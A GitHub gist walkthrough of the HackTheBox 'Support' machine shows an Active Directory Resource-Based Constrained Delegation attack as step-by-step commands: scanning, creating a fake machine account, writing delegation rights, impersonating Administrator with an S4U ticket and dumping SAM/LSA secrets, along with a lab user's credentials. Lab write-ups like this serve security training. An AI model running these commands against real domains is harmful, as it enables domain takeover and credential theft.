Skip to content

Instantly share code, notes, and snippets.

@RajChowdhury240

RajChowdhury240/dum.md

Created January 17, 2026 22:52
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save RajChowdhury240/2aa3120c2e1b4101686523d54dfdbc9d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save RajChowdhury240/2aa3120c2e1b4101686523d54dfdbc9d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
dum.md

RBCD Using NXC

For this demo i will be using the machine Support from HackTheBox

image

lets resolve the domain name of the target & add it to our /etc/hosts file by :

❯ sudo nxc smb 10.129.251.96 -u 'Guest' -p '' --generate-hosts-file /etc/hosts
image

Nmap Scan

❯ rustscan -a support.htb

❯ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49679,49754 -sC -sV -Pn support.htb
image

According to rustscan and nmap result, we have ports that are opened:

Ports Open Service
53 Simple DNS Plus
88,464 Kerberos
135,593,49664,49668,49674,49679,49703,57579,58137 RPC
139,445 SMB
389,636,3268,3269 LDAP
5985 WinRM

at this stage lets say we have a set of credentials of a compromised low priv user

support : Ironside47pleasure40Watchful

lets check the machine quota first

❯ nxc ldap support.htb -u support -p 'Ironside47pleasure40Watchful' -M maq
image

ok sweet , that means we can create a computer but first lets take a look at the bloodhound data, so first what i will do i gather the bloodhound data by :

cargo install rusthound-ce

https://github.com/g0h4n/RustHound-CE

❯ rusthound-ce -d support.htb -u support@support.htb -z -c
image

our current owned user is support we will mark it as owned & check for any outbound control edges are there or not :

image image

The attack (High Level):

  1. We are going to create a fake computer on the domain.
  2. Configure RBCD by setting the msds-allowedtoactonbehalfofotheridentity to allow our computer to act on behalf of the DC.
  3. Perform & S4U attack to get a kerberos ticket on behalf of the administrator.
  4. Pass the admins ticket to get RCE on the target.

Step 1 : Create a Fake Computer(Machine) account

using impacket :

❯ addcomputer.py -computer-name 'raj' -computer-pass 'hackme' -dc-ip 10.129.251.96 support.htb/support:Ironside47pleasure40Watchful
image

Alternate using BloodyAD to create a computer :

❯ bloodyAD --host 10.129.254.78 -u support -p 'Ironside47pleasure40Watchful' -d support.htb add computer 'raj' 'hackme'
image

My Created Fake Computer Account - raj$ : hackme

Step 2 : Give RBCD Rights to your fake Computer Account

using impacket :

❯ rbcd.py -delegate-from 'raj$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
image

Alternate - using BloodyAD to grant RBCD rights :

❯ bloodyAD --host 10.129.254.78 -u support -p 'Ironside47pleasure40Watchful' -d support.htb add rbcd 'DC$' 'raj$'
image

Step 3 : Get the Silver ticket of target Impersonation user (e.g Administrator) using nxc

❯ nxc smb support.htb -u 'raj$' -p 'hackme' --delegate Administrator

❯ nxc smb support.htb -u 'raj$' -p 'hackme' --delegate Administrator --sam --lsa
image

Bling Bling , we got the silver ticket of Administrator & as well as the NT Hash of Administrator too!

Alternate of getting silver ticket using getST.py Normal way :

❯ getST.py support.htb/'raj$':'hackme' -spn cifs/dc.support.htb -impersonate Administrator
image image

Hope you enjoyed the trick!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment